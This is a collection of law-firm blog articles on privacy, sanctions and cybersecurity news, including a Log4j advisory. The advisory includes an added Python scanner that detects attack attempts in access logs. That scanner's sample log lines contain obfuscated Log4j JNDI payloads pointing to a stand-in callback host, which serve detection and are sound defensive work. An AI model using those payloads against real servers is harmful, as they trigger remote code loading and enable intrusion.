How Businesses Can Use LinkedIn Company Newsletters in Their Marketing Efforts

LinkedIn has added what I think is the most helpful tool in a long time for businesses to engage with and bring value to their followers – the ability for LinkedIn Company Pages to publish email newsletters right through LinkedIn.

This underscores the importance of having a company page and how it can be used as a content hub for marketing and recruiting your business.

LinkedIn Company Page newsletters are available to pages with more than 150 followers that actively maintain their LinkedIn presence.

You can create a LinkedIn Company Page newsletter in three simple steps:

  1. Create: Start writing an article from your Company Page and select “Create a Newsletter.” Give it a title, add a header image (LinkedIn prompts you with the dimensions) and paste in your text. You can add hyperlinks and images to each issue too.
  2. Publish: When you publish your newsletter it posts to your feed and LinkedIn notifies your followers. They can opt in to receive email and in-platform notifications when you publish new issues.
  3. Review performance: View the analytics for each issue and see the number of subscribers. The number grows quickly, and because readers opt in themselves you sidestep the consent problems that bought or scraped email lists raise under GDPR.

There’s a lot of opportunity here because it is a new feature (for companies – it’s been available to individuals for a short time) and most companies don’t know about it yet (and certainly aren’t using it yet), so being an early adopter is to your benefit.

Even if you send out an email newsletter, you should still utilize the LinkedIn platform to send out a newsletter because you will reach a different audience and cast a wider net for your content.

In addition, people are opting into this newsletter, so it’s not building an audience from scratch, and if you haven’t ever sent out an email newsletter, this is a great way to start. If email marketing programs and CRM management tools overwhelm you, this is a great way to test out the waters.

It’s also really easy to repurpose content you already have. I would include hyperlinks to your website or blog with the full text (in order to keep the newsletter short and to drive traffic to your site).

You can embed links from YouTube into the newsletter to play. Check out my LinkedIn newsletter to see how it looks.

Here are some content ideas for what you can include in your LinkedIn Company Page Newsletter:

  • Article snippets with links to your latest blog posts or client alerts
  • Links to past webinars (provide a synopsis too)
  • Links to recent podcasts and videos (with shownotes)
  • Recent case studies
  • Q&As with your employees
  • Highlights of your community service/pro bono work
  • Announcements of your recent hires
  • Recent press coverage (this would be the only place where I would recommend including self-promotional items in the newsletter – the rest of it should be client-focused)
  • Upcoming events/webinars – this is a great way to promote them
  • Open jobs – why not promote them through this newsletter? It’s a competitive job market
  • News about your diversity and women’s initiatives programs – clients care a lot about this

Check out this new feature and let me know what you think of it. With nearly 800 million people on LinkedIn and the fact that your competitors are very likely not using it yet, it’s at least worth trying out.

Copyright © 2022, Stefanie M. Marrone. All Rights Reserved.

Google to Launch Google Analytics 4 in an Attempt to Address EU Privacy Concerns

On March 16, 2022, Google announced the launch of its new analytics solution, “Google Analytics 4.” Google Analytics 4 aims, among other things, to address recent developments in the EU regarding the use of analytics cookies and data transfers resulting from such use.

Background

On August 17, 2020, the non-governmental organization None of Your Business (“NOYB”) filed 101 identical complaints with 30 European Economic Area data protection authorities (“DPAs”) regarding the use of Google Analytics by various companies. The complaints focused on whether the transfer of EU personal data to Google in the U.S. through the use of cookies is permitted under the EU General Data Protection Regulation (“GDPR”), following the Schrems II judgment of the Court of Justice of the European Union. Following these complaints, the French and Austrian DPAs ruled that the transfer of EU personal data from the EU to the U.S. through the use of the Google Analytics cookie is unlawful.

Google’s New Solution

According to Google’s press release, Google Analytics 4 “is designed with privacy at its core to provide a better experience for both our customers and their users. It helps businesses meet evolving needs and user expectations, with more comprehensive and granular controls for data collection and usage.”

The most impactful change from an EU privacy standpoint is that Google Analytics 4 will no longer store IP addresses, thereby limiting the data transfers resulting from the use of Google Analytics that came under scrutiny in the EU following the Schrems II ruling. It remains to be seen whether this change will ease EU DPAs’ concerns about Google Analytics’ compliance with the GDPR.

Google’s previous analytics solution, Universal Analytics, will no longer be available beginning July 2023. In the meantime, companies are encouraged to transition to Google Analytics 4.

Read Google’s press release.

Copyright © 2022, Hunton Andrews Kurth LLP. All Rights Reserved.

Chinese APT41 Attacking State Networks

Although we are receiving frequent alerts from CISA and the FBI about the potential for increased cyber threats coming out of Russia, China continues its cyber threat activity through APT41, which has been linked to China’s Ministry of State Security. According to Mandiant, APT41 has launched a “deliberate campaign targeting U.S. state governments” and has successfully attacked at least six state government networks by exploiting various vulnerabilities, including the Log4j vulnerability.

According to Mandiant, even after the China-based operators are evicted from a state government network, they return weeks later and keep trying to get back into the same network through a different vulnerability (a “re-compromise”). One successful route was a zero-day vulnerability in USAHerds, a web application that state agriculture agencies use to track livestock. Once the intruders get into a network through USAHerds, they leverage that foothold to move to other parts of the network and access and steal information, including personal information.

Mandiant’s outlook on these attacks is sobering:

“APT41’s recent activity against U.S. state governments consists of significant new capabilities, from new attack vectors to post-compromise tools and techniques. APT41 can quickly adapt their initial access techniques by re-compromising an environment through a different vector, or by rapidly operationalizing a fresh vulnerability. The group also demonstrates a willingness to retool and deploy capabilities through new attack vectors as opposed to holding onto them for future use. APT41 exploiting Log4J in close proximity to the USAHerds campaign showed the group’s flexibility to continue targeting U.S state governments through both cultivated and co-opted attack vectors. Through all the new, some things remain unchanged: APT41 continues to be undeterred by the U.S. Department of Justice (DOJ) indictment in September 2020.”

Both Russia and China continue to conduct cyber-attacks against both private and public networks in the U.S. and there is no indication that the attacks will subside anytime soon.

Copyright © 2022 Robinson & Cole LLP. All rights reserved.

GDPR Privacy Rules: The Other Shoe Drops

Four years after GDPR was implemented, we are seeing the pillars of the internet business destroyed. Given two new EU decisions affecting the practical management of data, all companies collecting consumer data in the EU are re-evaluating their business models and will soon be considering wholesale changes.

On one hand, the GDPR is creating the world its drafters intended – a world where personal data is less of a commodity exploited and traded by business. On the other hand, GDPR enforcement has taken the form of a wrecking ball, leading to data localization in Europe and substitution of government meddling for consumer choice.

For years we have watched the EU courts and enforcement agencies apply GDPR text to real-life cases, wondering if the legal application would be more of a nip and tuck operation on ecommerce or something more bloody and brutal. In 2022, we received our answer, and the bodies are dropping.

In January the Austrian data protection authority decided that companies can’t use Google Analytics to study their own site’s web traffic. The same conclusion was reached last week by French regulators. While Google doesn’t announce statistics about product usage, website tracker BuiltWith published that 29.3 million websites use Google Analytics, including 69.5 percent of Quantcast’s Top 10,000 sites, and that is more than ten times the next most popular option. So vast numbers of companies operating in Europe will need to change their platform analytics provider – if the Euro-crats will allow them to use site analytics at all.

But these decisions were not based on the functionality of Google Analytics, a tool that does not even capture personally identifiable information – no names, no home or office address, no phone numbers. Instead, these decisions that will harm thousands of businesses were a result of the Schrems II decision, finding fault in the transfer of this non-identifiable data to a company based in the United States. The problem here for European decision-makers is that US law enforcement may have access to this data if courts allow them. I have written before about this illogical conclusion and won’t restate the many arguments here, other than to say that EU law enforcement behaves the same way.

The effects of this decision will be felt far beyond the huge customer base of Google Analytics. The logic of this decision effectively means that companies collecting data from EU citizens can no longer use US-based cloud services like Amazon Web Services, IBM, Google, Oracle or Microsoft. I would anticipate that huge cloud player Alibaba Cloud could suffer the same proscription if Europe’s privacy panjandrums decide that China’s privacy protection is as threatening as the US.

The Austrians held that all the sophisticated measures taken by Google to encrypt analytic data meant nothing, because if Google could decrypt it, so could the US government. By this logic, no US cloud provider – the world’s primary business data support network – could “safely” hold EU data. Which means that the Euro-crats are preparing to fine any EU company that uses a US cloud provider. Max Schrems saw this decision in stark terms, stating, “The bottom line is: Companies can’t use US cloud services in Europe anymore.”

This decision will ultimately support the Euro-crats’ goal of data localization as companies try to organize local storage/processing solutions to avoid fines. Readers of this blog have seen coverage of the EU’s tilt toward data localization (for example, here and here) and away from the open internet that European politicians once held as the ideal. The Euro-crats are taking serious steps toward forcing localized data processing and cutting US businesses out of the ecommerce business ecosystem. The Google Analytics decision is likely to be seen as a tipping point in years to come.

In a second major practical online privacy decision, earlier this month the Belgian Data Protection Authority ruled that the Interactive Advertising Bureau Europe’s Transparency and Consent Framework (TCF), a widely-used technical standard built for publishers, advertisers, and technology vendors to obtain user consent for data processing, does not comply with the GDPR. The TCF allows users to accept or reject cookie-based advertising, relieving websites of the need to create their own expensive technical solutions, and creating a consistent experience for consumers. Now the TCF is considered per se illegal under EU privacy rules, casting thousands of businesses to search for or design their own alternatives, and removing online choices for European residents.

The Belgian privacy authority reached this conclusion by holding that the Interactive Advertising Bureau was a “controller” of all the data managed under its proposed framework. As stated by the Center for Data Innovation, this decision implies “that any good-faith effort to implement a common data protection protocol by an umbrella organization that wants to uphold GDPR makes said organization liable for the data processing that takes place under this protocol.” No industry group will want to put itself in this position, leaving businesses to their own devices and making ecommerce data collection much less consistent and much more expensive – even if that data collection is necessary to fulfill the requests of consumers.

For years companies thought that informed consumer consent would be a way to personalize messaging and keep consumer costs low online, but the EU has thrown all online consent regimes into question. EU regulators have effectively decided that people can’t make their own decisions about allowing data to be collected. If TCF – the consent system used by 80% of the European internet and a system designed specifically to meet the demands of the GDPR – is now illegal, then, for a second time in a month, all online consumer commerce is thrown into confusion. Thousands were operating websites with TCF and Google Analytics, believing they were following the letter of the law. That confidence has been smashed.

We are finally seeing the practical effects of the GDPR beyond its simple utility for fining US tech companies. Those effects are leading to a closed-border internet around Europe and a costlier, less customizable internet for EU citizens. The EU is clearly harming businesses around the world and making its internet a more cramped place. I have trouble seeing the logic and benefit of these decisions, but the GDPR was written to shake the system, and privacy benefits may emerge.

Copyright © 2022 Womble Bond Dickinson (US) LLP All Rights Reserved.

Fitness App Agrees to Pay $56 Million to Settle Class Action Alleging Dark Pattern Practices

On February 14, 2022, Noom Inc., a popular weight loss and fitness app, agreed to pay $56 million, and provide an additional $6 million in subscription credits to settle a putative class action in New York federal court. The class is seeking conditional certification and has urged the court to preliminarily approve the settlement.

The suit was filed in May 2020 when a group of Noom users alleged that Noom “actively misrepresents and/or fails to accurately disclose the true characteristics of its trial period, its automatic enrollment policy, and the actual steps customers need to follow in attempting to cancel a 14-day trial and avoid automatic enrollment.” More specifically, users alleged that Noom engaged in an unlawful auto-renewal subscription business model by luring customers in with the opportunity to “try” its programs, then imposing significant barriers to the cancellation process (e.g., only allowing customers to cancel their subscriptions through their virtual coach), resulting in the customers paying a nonrefundable advance lump-sum payment for up to eight (8) months at a time. According to the proposed settlement, Noom will have to substantially enhance its auto-renewal disclosures, require customers to take a separate action (e.g., check box or digital signature) to accept auto-renewal, and provide customers a button on the customer’s account page for easier cancellation.

Regulators at the federal and state level have recently made clear their focus on enforcement actions against “dark patterns.” We previously summarized the FTC’s enforcement policy statement from October 2021 warning companies against using dark patterns that trick consumers into subscription services. More recently, several state attorneys general (e.g., in Indiana, Texas, the District of Columbia, and Washington State) announced their commitment to ramp up enforcement against “dark patterns” used to collect consumers’ location data.

Article By: Privacy and Cybersecurity Practice Group at Hunton Andrews Kurth

Copyright © 2022, Hunton Andrews Kurth LLP. All Rights Reserved.

New Poll Underscores Growing Support for National Data Privacy Legislation

Over half of American voters would support a federal data privacy law, according to a recent poll from Politico and Morning Consult. The poll found that 56 percent of registered voters would either strongly or somewhat support a proposal to “make it illegal for social media companies to use personal data to recommend content via algorithms.” Democrats were most likely to support the proposal at 62 percent, compared to 54 percent of Republicans and 50 percent of Independents. Still, the numbers may show that bipartisan action is possible.

The poll is indicative of Americans’ increasing data privacy awareness and concerns. Colorado, Virginia, and California all passed or updated data privacy laws within the last year, and nearly every state is considering similar legislation. Additionally, Congress held several high-profile hearings last year soliciting testimony from several tech industry leaders and whistleblower Frances Haugen. In the private sector, Meta CEO Mark Zuckerberg has come out in favor of a national data privacy standard similar to the EU’s General Data Protection Regulation (GDPR).

Politico and Morning Consult released the poll results days after Senator Ron Wyden (D-OR) accepted a 24,000-signature petition calling for Congress to pass a federal data protection law. Senator Wyden, who recently introduced his own data privacy proposal called the “Mind Your Own Business Act,” said it was “past time” for Congress to act.

He may be right: U.S./EU data flows have been on borrowed time since 2020. The GDPR restricts transfers of personal data to countries the EU has not found to provide adequate protection, the United States among them, unless another transfer mechanism applies. The EU-U.S. Privacy Shield framework served as that mechanism for participating companies, but the Court of Justice of the European Union invalidated it in the 2020 Schrems II decision, and data flows between the U.S. and the EU have been in legal limbo ever since. Eventually, Congress and the EU will need to address the situation, and a federal data protection law would be a long-term solution.

This post was authored by C. Blair Robinson, legal intern at Robinson+Cole. Blair is not yet admitted to practice law.


Copyright © 2022 Robinson & Cole LLP. All rights reserved.

New Tools in the Fight Against Counterfeit Pharmaceuticals

The explosive growth of internet pharmacies and direct-to-consumer shipment of pharmaceuticals has provided increased access to, and reduced the cost of, important medications. Unfortunately, these same forces have increased the risks that counterfeit medicines will make their way to consumers, endangering patient safety and affecting manufacturers’ reputation in the public eye.

While the Food and Drug Administration attempts to police such misconduct through enforcement of the Federal Food, Drug, and Cosmetic Act (FDCA), the resources devoted to enforcement are simply no match for the size and scope of the counterfeiting threat. Fortunately, pharmaceutical manufacturers are not without recourse, as several well-established tools may be used in the right circumstances to stop counterfeiters from profiting from the sale of knock-offs.

Experienced litigators can use the Lanham Act and the Racketeer Influenced and Corrupt Organizations (RICO) Act to stop unscrupulous individuals and organizations from deceiving customers with counterfeit versions of trademarked drugs. Until recently, these legal weapons – including search warrants, seizures, forfeitures, and significant penalties – were typically wielded only by the government and only in criminal prosecutions.

As one recent case demonstrates, however, many of the tools that law enforcement has used for years to combat counterfeiters are also available to pharmaceutical manufacturers. In Gilead Sciences, Inc. v. Safe Chain Solutions, LLC, et al., the manufacturer of several trademarked HIV medications filed a civil complaint, under seal, alleging violations of the Lanham Act and RICO against scores of individuals and companies that were allegedly selling counterfeit versions of these drugs to patients across the country.

By deploying private investigators and techniques typically used by law enforcement, Gilead was able to gather a substantial amount of evidence before even filing the case. The company then used this evidence to secure ex parte seizure warrants and asset freezes, allowing it to locate and seize thousands of counterfeit pills and packaging before they could be shipped to unsuspecting consumers. Through the seizure of the financial proceeds of the alleged counterfeiting, Gilead prevented the dissipation of assets. If the company can successfully prove its RICO case, it stands to recover treble damages and attorneys’ fees as well.

Manufacturers of trademarked pharmaceuticals may consider using these and other tools to tackle the threat posed by counterfeiters. By drawing upon the experience and skills of trained litigators – particularly counsel who previously deployed these tools on behalf of the government while serving as federal prosecutors – companies can proactively protect their intellectual property and the consumers who depend on their products.

© 2022 BARNES & THORNBURG LLP

Patch Up – Log4j and How to Avoid a Cybercrime Christmas

A vulnerability so dangerous that Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly called it “one of the most serious [she’s] seen in [her] entire career, if not the most serious” arrived just in time for the holidays. On December 10, 2021, CISA and the director of cybersecurity at the National Security Agency (NSA) began alerting the public to a critical vulnerability (CVE-2021-44228) in the Apache Log4j Java logging library. Civilian government agencies have been instructed to mitigate the vulnerability by Christmas Eve, and companies should follow suit.

The Log4j vulnerability lets a threat actor execute arbitrary code on any server, on-premises or in the cloud, whose application logs attacker-controlled input through a vulnerable Log4j 2, thereby gaining control of the affected server. CISA expects the vulnerability to affect hundreds of millions of devices. This is a widespread critical vulnerability and companies should quickly assess whether, and to what extent, they or their service providers are using Log4j.

Immediate Recommendations

  • Immediately upgrade all Apache Log4j 2 deployments to the latest patched release. Version 2.15.0 was the first fix; Apache subsequently released 2.16.0 and later to close follow-on issues, so do not stop at 2.15.0. Where an immediate upgrade is not possible, remove the JndiLookup class from the classpath as an interim mitigation.
  • Ask your service providers whether their products or environment use Log4j, and if so, whether they have patched to the latest version. Helpfully, CISA sponsors a community-sourced GitHub repository with a list of software related to the vulnerability as a reference guide.
  • Confirm your security operations are monitoring internet-facing systems for indicators of compromise.
  • Review your incident response plan and ensure all response team information is up to date.
  • If your company is involved in an acquisition, discuss the security steps taken within the target company to address the Log4j vulnerability.
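The monitoring recommendation above is easier to act on with a concrete check. The following Python script is an added example, not part of the Bracewell alert: it scans web-server access-log lines for the JNDI lookup strings that Log4j exploitation attempts carry, after undoing the common obfuscations (`${lower:j}`, `${upper:...}` and the `${...:-x}` default-value trick) that defeat a naive grep for `${jndi:`. The log lines are constructed for the example and the callback addresses use a documentation IP range; they are not real indicators.

```python
import re
import sys
from dataclasses import dataclass

# Constructed access-log lines for the example (documentation-range IPs, not real indicators).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:${lower:r}mi://198.51.100.7:1099/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7/c}"',
    '10.0.0.11 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/${version} HTTP/1.1" 200 99 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: its body contains no further "${".
_INNER = re.compile(r'\$\{([^${}]*)\}')
# After normalisation: a JNDI lookup and its scheme (ldap, ldaps, rmi, dns, iiop, ...).
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:', re.IGNORECASE)
# The callback host that follows the scheme.
_HOST = re.compile(r'://([^/:\s}]+)')


def _resolve(m):
    """Collapse one innermost lookup the way Log4j 2's string substitution would,
    for the three forms attackers use to hide the literal text "jndi"."""
    body = m.group(1)
    if body.lower().startswith('lower:'):
        return body[len('lower:'):].lower()
    if body.lower().startswith('upper:'):
        return body[len('upper:'):].upper()
    # Default-value syntax: ${anything:-X} yields X when the lookup is undefined,
    # so ${::-j} and ${env:NOPE:-j} both become "j".
    default = re.match(r'^(.*?):-(.*)$', body)
    if default:
        return default.group(2)
    return m.group(0)  # not an obfuscation form; leave it for the detector


def normalize(text, max_rounds=20):
    """Resolve nested obfuscation lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        resolved = _INNER.sub(_resolve, text)
        if resolved == text:
            return text
        text = resolved
    return text


@dataclass
class Finding:
    line_no: int
    scheme: str
    host: str
    normalized: str


def scan(lines):
    """Return one Finding per line that carries a JNDI lookup after normalisation."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        host = _HOST.search(norm, m.start())
        findings.append(Finding(line_no, m.group(1).lower(),
                                host.group(1) if host else '', norm))
    return findings


if __name__ == '__main__':
    # Usage: python log4j_scan.py access.log   (no argument: run on the sample lines)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding='utf-8', errors='replace') as fh:
            lines = [l.rstrip('\n') for l in fh]
    else:
        lines = SAMPLE_LOGS
    for f in scan(lines):
        print(f'line {f.line_no}: jndi scheme={f.scheme} callback_host={f.host}')
```

Run it over every log that records attacker-controlled fields (User-Agent, query strings, request headers, login names), not just the access log, because the vulnerable code path is whatever the application passes to Log4j. A hit shows an attempt, not a confirmed compromise; the outbound connection to the callback host is the evidence that the lookup actually fired, so pair this with egress logs for the same timestamps.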

The versatility of this vulnerability has already attracted the attention of malicious nation-state actors. For example, government-affiliated cybercriminals in Iran and China have a “wish list” (no holiday pun intended) of entities that they are aggressively targeting with the Log4j vulnerability. Due to this malicious nation-state activity, if your company experiences a ransomware attack related to the Log4j vulnerability, it is particularly important to pay attention to potential sanctions-related issues.

Companies with additional questions about the Log4j vulnerability and its potential impact on technical threats and potential regulatory scrutiny or commercial liability are encouraged to contact counsel.

© 2021 Bracewell LLP

OFAC Reaffirms Focus on Virtual Currency With Updated Sanctions Law Guidance

On October 15, 2021, the US Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced updated guidance for virtual currency companies in meeting their obligations under US sanctions laws. On the same day, OFAC also issued guidance clarifying various cryptocurrency-related definitions.

Coming on the heels of the Anti-Money Laundering Act of 2020—and in the context of the Biden administration’s effort to crack down on ransomware attacks—the recent guidance is the latest indication that regulators are increasingly focusing on virtual currency and blockchain. In light of these developments, virtual currency market participants and service providers should ensure they are meeting their respective sanctions obligations by employing a “risk-based” anti-money laundering and sanctions compliance program.

This update highlights the government’s continued movement toward subjecting the virtual currency industry to the same requirements, scrutiny and consequences in cases of noncompliance as applicable to traditional financial institutions.

IN DEPTH

The release of OFAC’s Sanctions Compliance Guidance for the Virtual Currency Industry indicates an increasing expectation for diligence, as OFAC has now made clear on several occasions that sanctions compliance “obligations are the same” for virtual currency companies, which must employ an unspecified “risk-based” program (See: OFAC Consolidated Frequently Asked Questions 560). OFAC published it with the stated goal of “help[ing] the virtual currency industry prevent exploitation by sanctioned persons and other illicit actors.”

With this release, OFAC also provided some answers and updates to two of its published sets of “Frequently Asked Questions.”

FAQ UPDATES (FAQ 559 AND 646)

All are required to comply with the US sanctions compliance program, including persons and entities in the virtual currency and blockchain community. OFAC has said time and again that a “risk-based” program is required but that “there is no single compliance program or solution suitable for all circumstances” (See: FAQ 560). While market participants and service providers in the virtual currency industry must all comply, the risk of violating US sanctions is most acute for certain key service providers, such as cryptocurrency exchanges and over-the-counter (OTC) desks that facilitate large volumes of virtual currency transactions.

OFAC previously used the term “digital currency” when it issued its first FAQ and guidance on the subject (FAQ 560), which stated that sanctions compliance is applicable to “digital currency” and that OFAC “may include as identifiers on the [Specially Designated Nationals and Blocked Persons] SDN List specific digital currency addresses associated with blocked persons.” Subsequently, OFAC placed certain digital currency addresses on the SDN List as identifiers.

While OFAC previously used the term “digital currency,” in more recent FAQs and guidance, it has used a combination of the terms “digital currency” and “virtual currency” without defining those terms until it released FAQ 559.

In FAQ 559, OFAC defines “virtual currency” as “a digital representation of value that functions as (i) a medium of exchange; (ii) a unit of account; and/or (iii) a store of value; and is neither issued nor granted by any jurisdiction.” This is a broad definition but likely encompasses most assets, which are commonly referred to as “cryptocurrency” or “tokens,” as most of these assets may be considered as “mediums of exchange.”

OFAC also defines “digital currency” as “sovereign cryptocurrency, virtual currency (non-fiat), and a digital representation of fiat currency.” This definition appears to be an obvious effort by OFAC to make clear that its definitions include virtual currencies issued or backed by foreign governments and stablecoins.

The reference to “sovereign cryptocurrency” is focused on cryptocurrency issued by foreign governments, such as Venezuela’s. This is not the first time OFAC has focused on sovereign cryptocurrency. It has described sovereign-backed cryptocurrencies as a high-risk vector for US sanctions circumvention. Executive Order (EO) 13827, which was issued on March 19, 2018, explicitly stated:

In light of recent actions taken by the Maduro regime to attempt to circumvent U.S. sanctions by issuing a digital currency in a process that Venezuela’s democratically elected National Assembly has denounced as unlawful, hereby order as follows: Section 1. (a) All transactions related to, provision of financing for, and other dealings in, by a United States person or within the United States, and digital currency, digital coin, or digital token, that was issued by, for, or on behalf of the Government of Venezuela on or after January 9, 2018, are prohibited as of the effective date of this order.

On March 19, 2018, OFAC issued FAQs 564, 565 and 566, which were specifically focused on Venezuela-issued cryptocurrencies, stating that “petro” and “petro gold” are considered a “digital currency, digital coin, or digital token” subject to EO 13827. While OFAC has not issued specific FAQs or guidance on other sovereign-backed cryptocurrencies, it may be concerned that a series of countries have stated publicly that they plan to test and launch sovereign-backed digital currencies, including Russia, Iran, China, Japan, England, Sweden, Australia, the Netherlands, Singapore and India. With the release of its most recent FAQs, OFAC is reaffirming that it views sovereign cryptocurrencies as highly risky and well within the scope of US sanctions programs.

The reference to a “digital representation of fiat currency” appears to be a reference to “stablecoins.” In theory, stablecoins are each worth a specified value in fiat currency (usually one USD each). Most stablecoins were touted as being completely backed by fiat currency stored in segregated bank accounts. The viability and safety of stablecoins, however, has recently been called into question. One of the biggest players in the stablecoin industry is Tether, which was recently fined $41 million by the US Commodity Futures Trading Commission for failing to have the appropriate fiat reserves backing its highly popular stablecoin (USDT). OFAC appears to have taken notice and states in its FAQ that “digital representations of fiat currency” are covered by its regulations and FAQs.

FAQ 646 provides some guidance on how cryptocurrency exchanges and other service providers should implement a “block” on virtual currency. Any US persons (or persons subject to US jurisdiction), including financial institutions, are required under US sanctions programs to “block” assets, which requires freezing the assets and notifying OFAC within 10 days. (See: 31 C.F.R. § 501.603 (b)(1)(i).) FAQ 646 makes clear that “blocking” obligations apply to virtual currency and also indicates that OFAC expects cryptocurrency exchanges and other service providers to “block” the virtual currency at issue and to freeze all other virtual currency wallets “in which a blocked person has an interest.”

Depending on the strength of the anti-money laundering/know-your-customer (AML/KYC) policies employed, it will likely prove difficult for cryptocurrency exchanges and other service providers to be sure that they have identified all associated virtual currency wallets in which a “blocked person has an interest.” It is possible that a cryptocurrency exchange could onboard a customer who complied with an appropriate risk-based AML/KYC policy and, unbeknownst to the cryptocurrency exchange, a blocked person “has an interest” in one of the virtual currency wallets. It remains to be seen how OFAC will employ this “has an interest” standard and whether it will take any cryptocurrency exchanges or other service providers to task for not blocking virtual currency wallets in which a blocked person “has an interest.” It is important for cryptocurrency exchanges or other service providers to implement an appropriate risk-based AML/KYC policy to defend any inquiries from OFAC as to whether it has complied with the various US sanctions programs, including by having the ability to identify other virtual currency wallets in which a blocked person “has an interest.”

UPDATED SANCTIONS COMPLIANCE GUIDANCE

OFAC’s recent framework for OFAC Compliance Commitments outlines five essential components for a virtual currency operator’s sanctions compliance program. These components generally track those applicable to more traditional financial institutions and include:

  1. Senior management should ensure that adequate resources are devoted to the support of compliance, that a competent sanctions compliance officer is appointed and that adequate independence is granted to the compliance unit to carry out its role.
  2. An operative risk assessment should be fashioned to reflect the unique exposure of the company. OFAC maintains both a public use sanctions list and a free search tool for that list which should be employed to identify and prevent sanctioned individuals and entities from accessing the company’s services.
  3. Internal controls must be put in place that address the unique risks recognized by the company’s risk assessment. OFAC does not have a specific software or hardware requirement regarding internal controls.
    1. Although OFAC does not specify required internal controls, it does provide recommended best practices. These include geolocation tools with IP address blocking controls, KYC procedures for both individuals and entities, transaction monitoring and investigation software that can review historically identified bad actors, the implementation of remedial measures upon internal discovery of weaknesses in sanctions compliance, sanctions screening and establishing risk indicators or red flags that require additional scrutiny when triggered.
    2. Additionally, information should be obtained upon the formation of each new customer relationship. A formal due diligence plan should be in place and operated sufficiently to alert the service provider to possible sanctions-related alarms. Customer data should be maintained and updated through the lifecycle of that customer relationship.
  4. To ensure an entity’s sanctions compliance program is effective and efficient, that entity should regularly test its compliance through independent, objective testing and auditing functions.
  5. Proper training must be provided to a company’s workforce. For a company’s sanctions compliance program to be effective, its workforce must be properly outfitted with the hard and soft skills required to execute its compliance program. Although training programs may vary, OFAC training should be provided annually for all employees.

KEY TAKEAWAYS

As noted in OFAC’s press release issued simultaneously with the updated FAQs, “[t]hese actions are a part of the Biden Administration’s focused, integrated effort to counter the ransomware threat.” The Biden administration’s increased focus on regulatory and enforcement action in the virtual currency space highlights the importance for market participants and service providers of implementing a robust compliance program. Cryptocurrency exchanges and other service providers must take special care in drafting and implementing their respective AML/KYC policies and in ensuring the existence of risk-based AML and sanctions compliance programs, which include a periodic training program. When responding to inquiries from OFAC or other regulators, it will be critical to have documented evidence of the implementation of a risk-based AML/KYC program and proof that employees have been appropriately trained on all applicable policies, including a sanctions compliance policy.

Ethan Heller, a law clerk in the firm’s New York office, also contributed to this article.

© 2021 McDermott Will & Emery
For the latest in Financial, Securities, and Banking legal news, read more at the National Law Review.

Thieves Breach Twitter Security to Commandeer Famous Accounts

The Twitter accounts of major companies and individuals were briefly taken over as part of a bitcoin scam. Former and current heads of state, global corporations, and presidential candidates had their Twitter accounts compromised. The tweets from many of the compromised accounts said similar things: for example, Kanye West’s feed stated that he is “giving back to my fans”; the messages from Bezos’, Barack Obama’s, and Joe Biden’s accounts said that they had “decided to give back to my community”; while Elon Musk’s account said “feeling greatful” and provided a link to a Bitcoin wallet to send money to. The tweets claimed that double the money would be sent back to a limited number of contributors.

Twitter, through its Twitter Support account, notified users that an internal investigation was conducted into the matter. The investigation revealed that several employees who had access to internal systems had their accounts compromised in a “coordinated social engineering attack.” Twitter’s internal system was then exploited to tweet from high-profile accounts. The attack was at least moderately successful, considering the Bitcoin wallets promoted in the tweets received over 300 transactions and Bitcoin worth over $100,000.

These tweets began at about 4 P.M. (Eastern Standard Time) on Wednesday, July 16. The first wave of attacks hit the Twitter accounts of prominent cryptocurrency leaders and companies, but expanded quickly after that. Along with Vice President Biden, President Obama, Kanye West, Bill Gates, Michael Bloomberg, and Elon Musk, large company accounts were also targeted, including Uber and Apple. Twitter’s initial response was to take down the offending tweets, but those were quickly replaced by new ones, an indication that the hackers maintained access to the individual accounts.

The persistence of the attacks led to Twitter disabling some of the platform’s services, including the ability of blue-checked (verified) Twitter users to tweet. The services were restored around four and a half hours after the suspicious tweets began. However, that shutdown period was not insignificant. Several National Weather Service Twitter accounts were shut down as a line of severe weather and possible tornadoes moved across the Midwest. The National Weather Service felt severely hampered in its ability to communicate with people about the impending storm.

In a tweet, Twitter’s CEO Jack Dorsey said that the company feels “terrible this happened” and that they are “diagnosing and will share everything we can when we have a more complete understanding of exactly what happened.” The full nature of this attack is yet to be determined. The legal implications will hinge on the findings of the investigation, including whether sensitive direct messages were accessed by the attackers. Considering the compromised accounts include current and former heads of state (Prime Minister Benjamin Netanyahu, President Obama, and Vice President Biden), there are also questions of national security involved.

The United States does not have a comprehensive federal data breach notification scheme. These obligations are instead provided by the fifty states and by sector-specific laws. More than 40 of the state breach notification laws contain a harm threshold pursuant to which notification is not required unless harm to affected individuals has occurred or is reasonably likely to occur. The EU’s GDPR also includes a similar assessment. As more information is disclosed, we will get a better understanding of Twitter’s and the attacked users’ incident response processes.

Copyright © 2020 Womble Bond Dickinson (US) LLP All Rights Reserved.